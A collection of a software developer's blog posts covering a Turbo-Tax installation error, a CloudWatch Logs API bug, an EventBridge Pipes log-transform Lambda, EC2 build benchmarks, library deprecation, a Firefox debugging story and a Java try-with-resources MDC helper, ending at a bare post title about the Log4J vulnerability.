<h1> Ordinary Users Don't Stand a Chance (2024-03-04) </h1>
<p> I have a “tax PC”: an old HP running Windows 10 that spends ten
months of the year in a closet, and two months hooked up to a segment of my
home network where it's unlikely to be attacked by the various network-attached
devices living in my house. Each February I spend a couple of days applying the
year's accumulated Windows updates, then I install Turbo-Tax so that I can do my
taxes.
<p> This year the Turbo-Tax installation failed:
<p> <img src="https://kdgregory.com/images/blog/turbotax_installation_error.png"
alt="Turbo-Tax installation error"/>
<p> I Googled for the missing DLL, and ended up on a Microsoft-hosted discussion board
where the first answer said that I needed to update my Visual C++ runtime, <em>and
provided a link to some third-party software site</em>.
<p> I looked in my computer's list of applications and saw that I had the
“2010” runtime. Apparently that isn't something that Windows
Update considers important. So I went to a Microsoft-hosted page, downloaded
the x64 version of the runtime (because the Windows “About”
page told me that I have an x64 computer with a 64-bit OS installed), and
… got the same error.
<p> Perhaps Turbo-Tax isn't using the latest Visual C++ (never mind that the
runtime advertises itself as being for 2015 onward). So I downloaded and
installed the x64 versions of the other runtimes, rebooted, and tried again.
And the installer failed again.
<p> Intuit provides a page titled “Troubleshoot installation and running
TurboTax for Windows.” This page is the first result if you go to their
Support page and search for the DLL name. It tells you to do things like
“Check your TurboTax CD and computer's CD drive” and “Clean
up and defragment your hard drive.”
<p> I kept digging through search results, and eventually I found a discussion
board posting in which someone says that they had to install the x86 version
of the Visual C++ runtime. OK, that makes sense: lowest common denominator;
x86 libraries work on an x64 processor. So I did that, installed, rebooted,
and the installer ran successfully. According to a comment on that thread,
the runtime should have been provided on the Turbo-Tax CD but wasn't.
<p> I've been a professional software developer for 40 years. I don't use Windows,
but I know what a DLL is, and I'm comfortable with searching the web for
answers. More important, I can identify a sketchy answer, and don't download
from random links on the Internet. But what about people who don't have that
knowledge?
<p> Maybe there aren't any other people who run Turbo-Tax locally, installing from
physical media. Or maybe everybody else installs on their brand-new PC running
Windows 11, with all the latest runtimes installed. But I have to believe that
I'm not unique. There must be other people who have run into this problem.
<p> What do they do?
<h1> Buggy Behavior From The CloudWatch Logs API (2023-07-13) </h1>
<blockquote>
<strong>Tip 26: “select” isn't broken.</strong>
<br/> The OS is probably not broken. And the database is probably just fine.
</blockquote>
<p class="inset"> <a href="https://pragprog.com/titles/tpp20/the-pragmatic-programmer-20th-anniversary-edition/" target="_blank">The Pragmatic Programmer</a>
<p> Words to live by — although I <em>did</em> once find a problem with Oracle's index management, which manifested in <code>select</code>. In my opinion, it's <em>the</em> maxim that defines a senior developer. Junior developers always look outside themselves whenever they run into a problem. Senior developers do everything they can to find where they've made a mistake. After all, there are a lot of people doing exactly the same things that you are; surely they would have found the bug first.
<p> But sometimes, it really is a bug in the system. This post is a story of how I determined the bug wasn't in my code. It's part catharsis, part “here's what you should do if you think select <em>is</em> broken,” and part calling out the issue for posterity in case someone else trips over it.
<p> In January of this year (2023), AWS made a change in the CloudWatch Logs API: you no longer needed to provide a sequence token when calling <a href="https://docs.aws.amazon.com/AmazonCloudWatchLogs/latest/APIReference/API_PutLogEvents.html" target="_blank">PutLogEvents</a>. Sequence tokens were always, I think, a “leaky abstraction”: a part of the internal implementation of CloudWatch Logs that found its way into the API. To summarize: you had to retrieve a sequence token before you could write events. When you wrote a batch of events, you received a sequence token back, which you could use to write the next batch — <em>unless</em> another process was writing to the same stream, in which case your sequence token would become invalid. Which meant that you had to retrieve a new token, using an API that had a relatively low limit on number of requests per second. With enough concurrent writers, hilarity would ensue as each would retrieve a token, try to use it, and fail because some other writer got there first.
<p> This change directly impacted <a href="https://github.com/kdgregory/log4j-aws-appenders" target="_blank">my logging library</a>, but initially I wasn't planning to adopt it: the library worked, the old behavior was supported, and to be honest, releasing the library involves a lot of toil. But then someone found a bug in my sequence-token retrieval code that appeared when the logging library re-initialized itself (Log4J2 FTW!). I fixed the immediate bug, and released a patch, but then decided it was a sign from the universe that I should remove the sequence token entirely. Plus, it always feels good to delete code!
<p> However, once I changed the code, one of my integration tests — the one that pits concurrent writers against each other — started failing. When it tried to verify the events that were written, it would often come up short.
<p> Failing integration tests are nothing new to this library: CloudWatch is an “eventually consistent” system, and while “eventually” often means seconds, it sometimes takes longer for the service to become consistent. As a result, failing tests <em>don't clean up after themselves</em>, so that I can look at what happened. I could then use my <a href="https://github.com/kdgregory/aws-misc/blob/trunk/utils/logs_reader.py" target="_blank">log reader utility</a>, and verify that all of the events were eventually available.
<p> This time, I didn't get all of the events back. Of course, I assumed that my reader was incorrect, and dove back into the documentation for the API calls it was using. I experimented with different arguments to the <code>GetLogEvents</code> call, and also tried <code>FilterLogEvents</code>. But nothing I did had an effect: I was still missing log entries.
<p> Next step was to dig into the logging library. I already had it fairly well instrumented: if you enable debug mode in the logging framework it will report everything that it does, including (optionally) every batch that it sends. Everything looked good, but there was a corner case that worried me: CloudWatch can reject events, and unlike Kinesis, it doesn't tell you which events it rejects. The appender pre-processed batches to remove invalid events, but didn't log failures (because there shouldn't be any). I changed that code, but no failures appeared.
<p> At this point I didn't think the bug was in my appender, but there was always the possibility that I was doing something incorrectly that I didn't log. My next step for debugging the appender would have been to turn up the logging level within the AWS SDK, to get a detailed report of what it was doing. However, this can become a case of drowning in detail, so first I looked at alternative methods of verifying the events.
<p> In addition to the <code>GetLogEvents</code> and <code>FilterLogEvents</code> API calls, CloudWatch provides a <a href="https://docs.aws.amazon.com/AmazonCloudWatchLogs/latest/APIReference/API_StartQuery.html" target="_blank">query</a> API. This API requires you to submit a query and then loop until it's done, so I didn't have a utility program that used it. But it's what the Console uses in the Insights page.
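<p> (If you do want to script it, the workflow is only a few dozen lines of boto3. Here's a minimal sketch; the log group name and query string are placeholders, and real code needs error handling.)
<pre class="codeSample">
import time

import boto3

logs = boto3.client('logs')

# submit the query; start/end times are epoch seconds
resp = logs.start_query(
    logGroupName='AppenderExample',        # placeholder
    startTime=int(time.time()) - 3600,
    endTime=int(time.time()),
    queryString='fields @timestamp, @message | sort @timestamp | limit 10000')

# poll until the query finishes
while True:
    results = logs.get_query_results(queryId=resp['queryId'])
    if results['status'] in ('Complete', 'Failed', 'Cancelled'):
        break
    time.sleep(1)

print(f"{results['status']}: {len(results['results'])} events")
</pre>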
<p> So I wrote a simple query to retrieve events from the stream; I was actually more interested in the reported count, rather than looking at all 20,000 expected events. But Insights told me that there weren't <em>any</em> events in the stream.
<p> At this point, I opened a ticket with AWS Support (fortunately, I have access to an account with a Business support contract, since “Basic” support no longer allows technical questions). I received an answer that “as designed,” Insights does not return any messages with timestamps prior to the log group's creation time. WTF?!?
<p> The back-story is that my Log4J 1.x appender lazily creates the log group and stream when it first writes a batch of messages, because Log4J 1.x does not have an explicit initialization phase. This is definitely something to be aware of if you use my library with Log4J 1.x (and, overwhelmingly, that's what my download counts indicate people are doing). The solution is to pre-create your log groups, so I modified the test to do so. This is not an issue with Log4J 2.x and Logback, which do have an initialization phase.
<p> But the test continued to fail. However, I could view the logs in Insights, and saw that <em>it</em> was able to retrieve all of the events (yet another approach, which also succeeded, was exporting to S3). And more interestingly, it was the <em>initial</em> few log messages that weren't being retrieved by <code>GetLogEvents</code>. I also called the <code>DescribeLogStreams</code> API, and it returned a later “first event timestamp” than expected, by a few milliseconds.
<p> This seemed worth another Support ticket: if I could retrieve all log events using one technique, and not using another, then clearly it was a problem with CloudWatch and not me.
<p> And now comes the most important lesson from this entire adventure: <em>do not assume that the AWS Support rep can see what you're describing</em>, and more important, <em>do not expect them to tell you that they can't</em>.
<p> I had created a log group/stream that demonstrated the problem, and referenced it in the ticket. I also attached the S3 export, the list of events from my log reader, and the initial events from an Insights query. The support rep seemed to agree that there was a problem. Then for a week they wrote nightly updates about how they were trying to re-upload the events and did not see a problem. They seemed to be trying random things, so I recommended building my library and running the integration test — at this point, my assumption was that AWS accepted that there was a problem based on my example group/stream, and were simply trying to re-create it at will.
<p> It turned out this was an incorrect assumption, which I learned when the original rep went dark and a new rep picked up the case. I had independently created a program that triggered the issue, so that they wouldn't have to run the integration tests. The new rep claimed to have run the program, did not see the issue, and pointed out that AWS did not have permission to view the original log group and stream that I had identified in the ticket!
<p> Seeing that the “web” interactions were not having any effect, I decided to try a chat session with a screenshare. I showed the rep the original group and stream, and how different retrieval methods returned different results. At the time it didn't seem to have much effect: he made sounds of acknowledgement, but was unable to assume the role I created to let him read events, and would go silent for minutes at a time while he was “try[ing] something.” All in all, not a great experience from my side.
<p> But it did seem to have an effect: the next morning I got a message from someone who claimed to be on the CloudWatch team, saying that they were able to re-create the problem. And that's where it stands today. For my part, the updates to my library are on hold until I hear back: while this may be superstition on my part, it seems to work better if I provide a sequence token (I suspect it's actually the delay from retrieving the token).
<p> And if you run into a problem with <code>GetLogEvents</code> not returning all of your events, feel free to reference case #12882575541 if you file a Support ticket.
<p> <strong> Update, 2023-08-22 </strong>
<p> AWS has resolved the problem: "We investigated and found that there was an issue with the service which in rare situations can incorrectly set the "firstEventTimestamp" on a log-stream [...] Our team has now fixed the issue with GetLogEvents not returning some events due to incorrectly set "firstEventTimestamp"." I have verified that my integration tests run (repeatedly) without a failure. It took just under three months (05/23 to 08/18) to resolve the case, two months (06/15) from the point that someone took it seriously. For a company the size of AWS, and a service with the reach of CloudWatch Logs, that seems pretty fast; I've had issues drag on far longer with in-house IT teams.
<h1> Using EventBridge Pipes to route CloudWatch Logs events to Kinesis (2023-01-03) </h1>
<p> Several years ago I <a href="https://blog.kdgregory.com/2019/09/streaming-cloudwatch-logs-to.html" target="_blank">wrote about</a> connecting CloudWatch Logs into a <a href="https://www.kdgregory.com/index.php?page=aws.loggingPipeline" target="_blank">logging pipeline</a> built on Kinesis Streams and Kinesis Firehose. To make that work, I wrote a <a href="https://github.com/kdgregory/aws-misc/tree/trunk/lambda/cloudwatch-log-transform" target="_blank">Lambda</a>.
<p> AWS announced EventBridge Pipes at re:Invent 2022, as an easy way to connect messaging services. Connecting CloudWatch Logs to Kinesis seemed like a good way to kick the tires on this service. It still requires a custom Lambda, but that Lambda is now much simpler, because it doesn't need to concern itself with the quirks of <code>PutRecords</code>.
<h2> The Problem </h2>
<p> When you subscribe a Kinesis stream to a log group, CloudWatch writes messages that look like this:
<pre class="codeSample">
H4sIAAAAAAAAA62QTU7DMBCF95zC8jqO7LHd2NkFNVRCdNWyggqF1gqG/MlxW6qqd2cK7QWA5bw382a+OdLWjWNVu+VhcDSn02JZvMzLxaKYlTSh/b5zAWUBUulJZiwXgHLT17PQbwd0imFw3caF8rNqh8b9mIsYXNWi+9DX6l6wi8mAAwgAxXx88413HZNaWDHBqXH7Oq6DH6LvuzvfRBdGmj/Ra+zqO7fcuS6e9SP1G4yXGRgltdLcGK41SKu0AQ2KC55hrYTNsJCWc5CCW5CgteEG90WP4BHDaS4mmTDGAOKBTa4PwfjzuUwAA0W4yUHl0iTYQqbl7eOMPLkLFV+Rdd+mH5s6uLoPhxQvVe9ptR/TS0s6r3xHGNlVzdYRPxINzx09JX/DsP+LIX6LsTrdfAHRwAP2RwIAAA==
</pre>
<p> That's a GZipped and Base64-encoded JSON object. When decoded, unzipped, and pretty-printed, it looks like this:
<pre class="codeSample">
{
"messageType": "DATA_MESSAGE",
"owner": "123456789012",
"logGroup": "AppenderExample",
"logStream": "Log4J1-Example-20221224-ithilien-351916",
"subscriptionFilters": [
"Example"
],
"logEvents": [
{
"id": "37284354508805523945825240107552419724039002310923255808",
"timestamp": 1671888278929,
"message": "2022-12-24 08:24:38,929 DEBUG [example-0] com.kdgregory.log4j.aws.example.Main - value is 52\n"
},
{
"id": "37284354508805523945825240107552419724039002310923255809",
"timestamp": 1671888278929,
"message": "2022-12-24 08:24:38,929 DEBUG [example-1] com.kdgregory.log4j.aws.example.Main - value is 52\n"
}
]
}
</pre>
<p> As you can see, CloudWatch combines multiple log events into a single message. However, most destinations — such as Elasticsearch — want individual events, not a nested array. So you need something that pulls apart the original event. For example, the <a href="https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/CWL_OpenSearch_Stream.html" target="_blank">AWS-provided OpenSearch integration</a>, which subscribes a Lambda to the log group, decomposes the messages, and writes them to the cluster. My previous implementation did a similar transformation, but wrote the log messages to a Kinesis stream.
<h2> EventBridge Pipes </h2>
<p> <a href="https://docs.aws.amazon.com/eventbridge/latest/userguide/eb-pipes.html" target="_blank">EventBridge Pipes</a> is modeled around a four-step process (image sourced from docs):
<p> <img src="https://docs.aws.amazon.com/images/eventbridge/latest/userguide/images/pipes_overview.png" width="90%" alt="EventBridge Pipes data flow"/>
<p> For simple pipelines, EventBridge gives you a “no code” solution that eliminates the middle two steps: you define an output format using path references to fields in the input messages. Unfortunately, this isn't usable for CloudWatch Logs messages: it can't (currently) handle Gzipped data, and can't extract the elements in an array. So we need to add an “enrichment” step that performs this operation.
<h2> Implementation </h2>
<p> You can implement the enrichment step in multiple ways, including an HTTP(S) API, but the easiest is a Lambda. Pipes invokes this Lambda with an event that contains one or more source records, and it returns zero or more result records.
<p> The source event looks like this:
<pre class="codeSample">
[
{
"eventSource": "aws:kinesis",
"eventVersion": "1.0",
"eventID": "shardId-000000000000:49636526735590005452916707570422271019264002608211165186",
"eventName": "aws:kinesis:record",
"invokeIdentityArn": "arn:aws:iam::123456789012:role/CloudWatchTransformPipeline-PipeRole-us-east-1",
"awsRegion": "us-east-1",
"eventSourceARN": "arn:aws:kinesis:us-east-1:123456789012:stream/log-subscription",
"kinesisSchemaVersion": "1.0",
"partitionKey": "87362ce96c65eb1b3125bf0129b99bee",
"sequenceNumber": "49636526735590005452916707570422271019264002608211165186",
"data": "...",
"approximateArrivalTimestamp": 1672490859.613
}
]
</pre>
<p> The first thing to call out is that this event is an array. EventBridge Pipes can batch messages together, so you must loop over the entire event and combine the results from each message (ie, a flat-map):
<pre class="codeSample">
def lambda_handler(event, context):
result = []
for message in event:
result += transform_messages(message)
return result
</pre>
<p> The <code>data</code> element is the GZipped and Base64-encoded message that I showed above. You process it with code that looks like this:
<pre class="codeSample">
data = base64.b64decode(message['data'])
data = gzip.decompress(data)
payload = json.loads(data)
</pre>
<p> The last thing to be aware of is that there are two types of messages that you'll get from a CloudWatch Logs subscription, identified by the <code>messageType</code> field. When the subscription first starts, CloudWatch sends a control message to the stream to verify that it can write messages. After that, it sends data messages. Your Lambda should ignore everything but the latter.
<pre class="codeSample">
if payload['messageType'] == 'DATA_MESSAGE':
# extract log events
else:
return []
</pre>
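<p> Putting those pieces together, a minimal <code>transform_messages()</code> looks something like the following sketch. The output field names here are my choice for this example; my complete implementation, linked below, does more.
<pre class="codeSample">
import base64
import gzip
import json


def transform_messages(message):
    # decode and decompress the payload carried in the Kinesis record
    data = base64.b64decode(message['data'])
    data = gzip.decompress(data)
    payload = json.loads(data)
    # ignore control messages
    if payload['messageType'] != 'DATA_MESSAGE':
        return []
    # flatten the logEvents array into one output record per event
    return [
        {
            'logGroup':  payload['logGroup'],
            'logStream': payload['logStream'],
            'timestamp': event['timestamp'],
            'message':   event['message'].strip()
        }
        for event in payload['logEvents']
    ]
</pre>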
<h2> Conclusion </h2>
<p> This post has shown you the basics of an EventBridge Pipes transform. You can find my complete example, which performs several transforms on the log events, <a href="https://github.com/kdgregory/aws-misc/tree/trunk/lambda/cloudwatch-log-transform-2" target="_blank">here</a>.
<p> While I don't think that EventBridge Pipes quite lives up to the hype of Werner Vogels' keynote (and that it has nothing in common with EventBridge other than a name), it does allow you to focus on your logic rather than the quirks of your source and destination. As such, it's a useful addition to your data transformation toolbox.
<h1> Does that i4i.metal instance really help your build times? (2023-01-01) </h1>
<p> Here in Philadelphia, the last day of 2022 was rainy and foggy; a day to stay inside. That, combined with $100 in AWS credits that were due to expire with the new year, made me decide to add another entry to my <a href="https://blog.kdgregory.com/2014/06/is-that-ssd-really-helping-your-build.html" target="_blank">series of posts</a> <a href="https://blog.kdgregory.com/2015/06/the-encryption-tax.html" target="_blank">evaluating</a> <a href="https://blog.kdgregory.com/2018/08/poor-efs-performance-for-software-builds.html" target="_blank">build</a> <a href="https://blog.kdgregory.com/2021/02/efs-build-performance-revisited.html" target="_blank">performance</a>. This time, I'm comparing my desktop PC to the current AWS king of the hill, an i4i.metal instance.
<p> If you don't make a habit of reading EC2 instance specs, the i4i.metal has 128 virtual CPUs (32 actual cores), 1 terabyte of RAM, 30 terabytes of locally-attached SSD storage spread over 8 drives, and 75,000 megabits of network bandwidth. It costs $10.982 per hour ($96,268.212 per year) on-demand in us-east-1. There are more expensive EC2 instance types; the p3dn.24xlarge costs $31.212 per hour, but has fewer vCPUs, less memory, and less disk.
<p> To see if the local SSD offered a performance improvement over EBS, I configured a 1 terabyte gp3 drive as the machine's root volume, and formatted one of the attached SSDs as ext4. I created a separate user, whose home directory was on the SSD, so all of the reads and writes for the builds should have stayed there.
<p> As a comparison, I have my ten-year-old desktop: an i7-3770k (not overclocked) with 32 GB of RAM and a 512 GB Samsung 860 Pro SSD. It cost around $750 to build (no graphics card). I also spun up an m5.large EC2 instance, for consistency with previous tests.
<p> Both of the AWS instances were running Amazon Linux 2; my devbox runs Xubuntu 20.04. All machines ran OpenJDK 1.8, although the specific builds varied (it's whatever the package manager installed). And I manually installed Maven 3.5.4 on all of the machines (it's what I'm running at home).
<p> For a test workload, I built the <a href="https://github.com/aws/aws-sdk-java-v2" target="_blank">AWS V2 Java SDK</a> (commit <code>0f7779ef</code>, corresponding to version 2.19.9-SNAPSHOT). This is a much bigger build than most people will ever deal with: almost 400 sub-projects, and over 100,000 Java files (including tests and generated code). I skipped tests, because it was clear that some of the tests involved timing delays; I wanted to see pure CPU/disk performance.
<p> I ran three builds with each configuration. The first was a “clean” build, forcing Maven to download all dependencies. The second was with empty buffer cache (<code>echo 3 > /proc/sys/vm/drop_caches</code>), and the third, run immediately afterward, should have benefited from any files that were in the cache. As it turned out, the numbers were so close that it didn't make sense to report them separately; all numbers in the table below are from the “empty cache” run (ie, no downloads involved). As with previous tests, I show the output from the Linux <code>time</code> command; the “real” column is the elapsed time of the build, and is what developers care about.
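<p> For the record, each timed run amounted to something like the following (reconstructed, so treat it as a sketch rather than the exact commands):
<pre class="codeSample">
# as root: drop the buffer cache before the timed run
echo 3 &gt; /proc/sys/vm/drop_caches

# timed build, skipping tests
time mvn clean install -DskipTests
</pre>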
<table>
<tbody>
<tr> <th> </th>
<th> Real </th>
<th> User </th>
<th> Sys </th> </tr>
<tr> <th align="left" style="padding-right: 1em;"> My DevBox </th>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> <code> 27m 24.406s </code> </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> <code> 80m 3.772s </code> </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> <code> 1m 16.792s </code> </td>
</tr>
<tr> <th align="left" style="padding-right: 1em;"> m5.large </th>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> <code> 54m 40.495s </code> </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> <code> 94m 1.207s </code> </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> <code> 1m 46.047s </code> </td>
</tr>
<tr> <th align="left" style="padding-right: 1em;"> i4i.metal EBS </th>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> <code> 17m 49.500s </code> </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> <code> 97m 30.694s </code> </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> <code> 2m 19.089s </code> </td>
</tr>
<tr> <th align="left" style="padding-right: 1em;"> i4i.metal SSD </th>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> <code> 17m 44.165s </code> </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> <code> 97m 6.427s </code> </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> <code> 2m 11.365s </code> </td>
</tr>
</tbody>
</table>
<p> I have to be honest, I was surprised: I expected a small improvement in performance, but not 35%! My guess at the reason for the difference, based on the higher “user” time, is that it's able to make more effective use of those 32 cores. The 55 MB CPU cache (versus 8 MB on my PC) may have helped as well. I think the only way to summarize this test is with the words of Ferris Bueller:
<blockquote>
It is so choice. If you have the means, I highly recommend picking one up.
</blockquote>
<h1> Deprecating log4j-aws-appenders (2022-12-14) </h1>
<p> I just made what I hope is the last release of my <a href="https://github.com/kdgregory/log4j-aws-appenders" target="_blank">log4j-aws-appenders</a> library. It started almost six years ago as a “weekend project” to produce a Log4J 1.x appender that wrote output to CloudWatch Logs. It has expanded over the years: I added Kinesis Streams and SNS as destinations, added support for Log4J 2.x and Logback, added support for the AWS 2.x Java SDK, and maintained the code as something I could be proud of.
<p> And other people found it useful: it's received a handful of GitHub stars, and sees around 30,000 downloads a month from Maven Central (overwhelmingly for Log4J 1.x!).
<p> But I think it's outlived its usefulness, and there are better options.
<p> I'll start with an explanation of why I wrote it. At the time, I was working on a project that had around a hundred EC2 virtual machines running pre-baked AMIs, and using the AWS-provided logging agent to write to CloudWatch. The pre-baked AMI meant that everything went to the same log stream: we didn't configure separate streams for separate instances. The agent wasn't (at that time) very good at recognizing the boundaries between log messages, and the multi-threaded nature of our servers meant that messages would be interleaved anyway. Throw in CloudWatch's limited ability to filter messages, and the result was a mess.
<p> As a result, I had two explicit goals for the first release: ensure that a Java LogEvent was written as a single CloudWatch Logs event (including stack traces), and allow different instances to write to different log streams. And this was better, but not great, because it still meant interleaved messages from different threads. So I implemented the Kinesis appender, <a href="https://www.kdgregory.com/index.php?page=aws.loggingPipeline" target="_blank">to send log messages to Elasticsearch</a>. I don't think my boss liked the monthly cost of a six-node Elasticsearch cluster, but the other developers liked the ability to quickly isolate a single web request and all of its related operations.
<p> So why deprecate it? The answer is that the AWS world has moved forward in the past six years. CloudWatch is the default logging destination for Lambda and ECS, and the CloudWatch agent for EC2 has gotten much better. And Insights has made searching CloudWatch much easier, especially if you write log messages in JSON.
<p> So rather than swim against the flow, I recommend that you use CloudWatch Logs rather than my library. For Lambda (and ECS or EKS with the <code>awslogs</code> driver), just write to Standard Error; it will be picked up by the runtime and sent to CloudWatch. For EC2, use the logging agent, configured to parse individual events. If you want to use Elasticsearch, you can <a href="https://blog.kdgregory.com/2019/09/streaming-cloudwatch-logs-to_12.html" target="_blank">use a subscription</a> to get the data out of CloudWatch Logs (something that's become easier with EventBridge Pipes, the topic of an upcoming post). Or you can use an HTTP appender (available in all the major logging frameworks), and wire up your own pipeline using API Gateway's Kinesis integration (something else that wasn't available six years ago).
<p> With all of these options, my library is superfluous. And while I think it's mature, stable, and bug-free, using it exposes your project to the risk of having a single volunteer maintainer responsible for a key part of your infrastructure.
<h1> A Self-Made Bug (2022-05-07) </h1>
<p> Chasing a bug can be one of the most frustrating parts of software development. All you have to start with is an observed behavior. Hopefully you can replicate that behavior. You then have to gather the information needed to understand what caused the bug, which is mostly about ruling out what <em>didn't</em> cause it. With luck, you have the tools (logging, system utilities) that let you do this.
<p> And then, when you figure out what it is and fix it, most of the time your thought is “wow, that was dumb.” It's definitely not the same feeling you get when you finish a challenging feature.
<p> This is the story of me tracking down a bug. I'm writing it as a form of catharsis, but also because I think it illustrates the lengths a developer has to go to in order to prove that something <em>is</em> a bug. In this case, it wasn't really a bug, just me doing something dumb and not realizing it.
<p> The story starts with me implementing what I thought would be a simple web service to let a client upload large files to S3. Simple, because I started with an example that I'd <a href="https://chariotsolutions.com/blog/post/two-buckets-and-a-lambda-a-pattern-for-file-processing/" target="_blank">written for a blog post</a>. After a couple of hours spent converting something intended as a teaching tool into something user-friendly and easy to deploy, I was ready to test. Some small files went through with no problem, so I selected a 12.5 GB file and went for a bicycle ride.
<p> When I got back, there was no browser running.
<p> The first rule of debugging is that you need to reproduce the bug, so I started the upload again and switched my focus to another task. An hour or so later, I went back to the VM running my test, and again, no browser running.
<p> I started the upload again, and paid careful attention to the requests flowing through the Network tab in the Firefox developer tools. Everything looked good, so I turned to <a href="https://www.man7.org/linux/man-pages/man1/top.1.html" target="_blank">top</a>: when programs die unexpectedly, it's often due to memory errors. Sure enough, I saw that the resident set size (RSS) kept growing.
<p> OK, probably a bug in my code. I'm not much of a JavaScript developer, and don't really understand how it manages memory, so I'm probably holding onto something unintentionally. Fortunately, <a href="https://github.com/chariotsolutions/aws-examples/blob/trunk/two_buckets_and_a_lambda/static/js/credentials.js" target="_blank">the code is simple</a>, and I was able to set a breakpoint in a "progress monitor" callback. After digging through various object trees accessible from my code, I was convinced that nothing I did caused the problem.
<p> Time to turn to Google (and <a href="https://duckduckgo.com" target="_blank">Duck Duck Go</a>, which I'm trying as an alternative), to see if maybe there's something wrong with the AWS JavaScript library. I didn't expect to find anything: the second rule of debugging is that when you think there's a problem with a commonly-used library, it's you. But I was using an older version of the library, and perhaps uploading 12 GB from the browser was unusual enough to hit a corner case. Unfortunately, most of the search hits were from Stack Overflow, and were basic “how do I use this library?” questions.
<p> One of the great things about having browsers built by different companies is that you can do comparison tests. I fired up Chrome, started the upload, and watched <code>top</code>; no change in its RSS, and the overall available memory remained constant. I started a Windows VM and did the same thing with Edge, and while the Windows Task Manager doesn't give the level of information that <code>top</code> does, it also appeared to handle the upload without a problem.
<p> More Googling, now on Firefox memory issues. And from that, I learned about <code>about:memory</code>, which lets you see the memory usage of every Firefox process. With that page open in one window, I started my upload from another. After a gigabyte or so of the upload, I checked the memory dump … and it didn't show any excess memory consumption. Neither did <code>top</code>. WTF?!?
<p> At this point it hit me: every time the browser crashed, I had Developer Tools open. So the browser was holding onto every chunk of the file that it uploaded, in case I wanted to go to the Network tab to inspect those requests.
<p> Is there a lesson here? Not really; it's just an example of following the process I first wrote about <a href="https://blog.kdgregory.com/2009/12/debugging-101-assumptions.html" target="_blank">a dozen years ago</a>. But as I said, it's catharsis, and a reminder that most problems are PEBKAC: Problem Exists Between Keyboard And Chair.
<h1> Leveraging try-with-resources to manage the mapped diagnostic context (2022-02-24) </h1>
<p> The mapped diagnostic context is an under-appreciated feature of logging
libraries. It's essentially a thread-local <code>Map</code>, to which you
add key-value pairs that provide context about what your program is doing.
Here's a trivial example:
<pre class="codeSample">
logger.info("program starting");
File file = new File(argv[0]);
MDC.put("outputFile", file.getAbsolutePath());
try (FileOutputStream fos = new FileOutputStream(file);
OutputStreamWriter osr = new OutputStreamWriter(fos, StandardCharsets.UTF_8);
BufferedWriter out = new BufferedWriter(osr))
{
logger.info("starting to write");
out.write("hello, world");
out.newLine();
logger.info("finished writing");
}
MDC.remove("outputFile");
logger.info("program finished");
</pre>
<p> When you run this program, using a logging config that outputs the MDC, you'll
see something like this:
<pre class="codeSample">
2022-02-23 07:28:01,673 INFO [main] c.kdgregory.example.Main - - program starting
2022-02-23 07:28:01,677 INFO [main] c.kdgregory.example.Main - outputFile=/tmp/test.txt - starting to write
2022-02-23 07:28:01,677 INFO [main] c.kdgregory.example.Main - outputFile=/tmp/test.txt - finished writing
2022-02-23 07:28:01,677 INFO [main] c.kdgregory.example.Main - - program finished
</pre>
<p> Web-apps can benefit enormously from the MDC: before processing the request, you
extract things like the invoking user, request path, session token, or a unique
request ID. This makes it easier to track down problems, because you can filter
the log by any of those parameters.
<p> But I've recently been doing a lot of data engineering work: reading files or database
tables, performing some transformation on them, and sending them to some destination.
These tasks tend to be complex, with multiple steps, and they tend to be performed
for multiple files or tables at a time. As with a web-app, it's really nice to add
contextual information such as table name and selection criteria to the MDC, and let
the logging framework write it with every message.
<p> The problem with the MDC is that every <code>put()</code> has to be paired with a
<code>remove()</code>. If you forget to remove a key it will “pollute”
every subsequent log message from that thread, giving you potentially misleading
information.
<p> However, one thing that I noticed is that I tend to set the MDC just before a
try-with-resources block. Or inside a loop that calls one or more functions that could
be wrapped in such a block. This led me to the <code>AutoMDC</code> class:
<pre class="codeSample">
logger.info("program starting");
File file = new File(argv[0]);
try (AutoMDC mdc = new AutoMDC("outputFile", file.getAbsolutePath());
FileOutputStream fos = new FileOutputStream(file);
OutputStreamWriter osr = new OutputStreamWriter(fos, StandardCharsets.UTF_8);
BufferedWriter out = new BufferedWriter(osr))
{
logger.info("starting to write");
out.write("hello, world");
out.newLine();
logger.info("finished writing");
}
logger.info("program finished");
</pre>
<p> Try-with-resources works with classes that implement <code>java.lang.AutoCloseable</code>:
an interface that declares the <code>close()</code> method. My <code>AutoMDC</code> class
implements this interface, and uses a <code>Set<String></code> to keep track of the
keys. It provides two methods (and the “convenience” constructor shown above):
<pre class="codeSample">
public AutoMDC put(String key, Object value)
{
keys.add(key);
MDC.put(key, String.valueOf(value));
return this;
}

@Override
public void close() throws Exception
{
for (String key : keys)
{
MDC.remove(key);
}
}
</pre>
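<p> To show the shape of the whole thing, here's a sketch of the remaining skeleton (the gist linked below is the authoritative version):
<pre class="codeSample">
public class AutoMDC implements AutoCloseable
{
    private Set&lt;String&gt; keys = new HashSet&lt;&gt;();

    // "convenience" constructor: accepts alternating key/value pairs
    public AutoMDC(Object... keysAndValues)
    {
        for (int ii = 0 ; ii &lt; keysAndValues.length ; ii += 2)
        {
            put(String.valueOf(keysAndValues[ii]), keysAndValues[ii + 1]);
        }
    }

    // put() and close() as shown above
}
</pre>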
<p> That's it: you can add items to the MDC in the try-with-resources initializer, or anywhere
inside the <code>try</code> block itself, and they'll be removed at the end. One downside
is that the <code>close()</code> method is called before any <code>catch</code> or
<code>finally</code> blocks; if you need to log contextual information in those places,
you'll need to do it manually.
<p> If you'd like to use this in your own programs, I've provided an implementation for
Logback as a <a href="https://gist.github.com/kdgregory/4574fd48c4875abc295ac6d54029ea02"
target="_blank">GitHub gist</a>; the same basic code can be adapted to whichever logging
framework you use.
<p> I think the idea of leveraging try-with-resources is a useful one for other situations,
especially those where you might otherwise turn to aspect-oriented programming. Plus,
it encourages the good habit of wrapping your code in try/catch blocks.
<h1> My take on the Log4J 2.x vulnerability (2021-12-18) </h1>
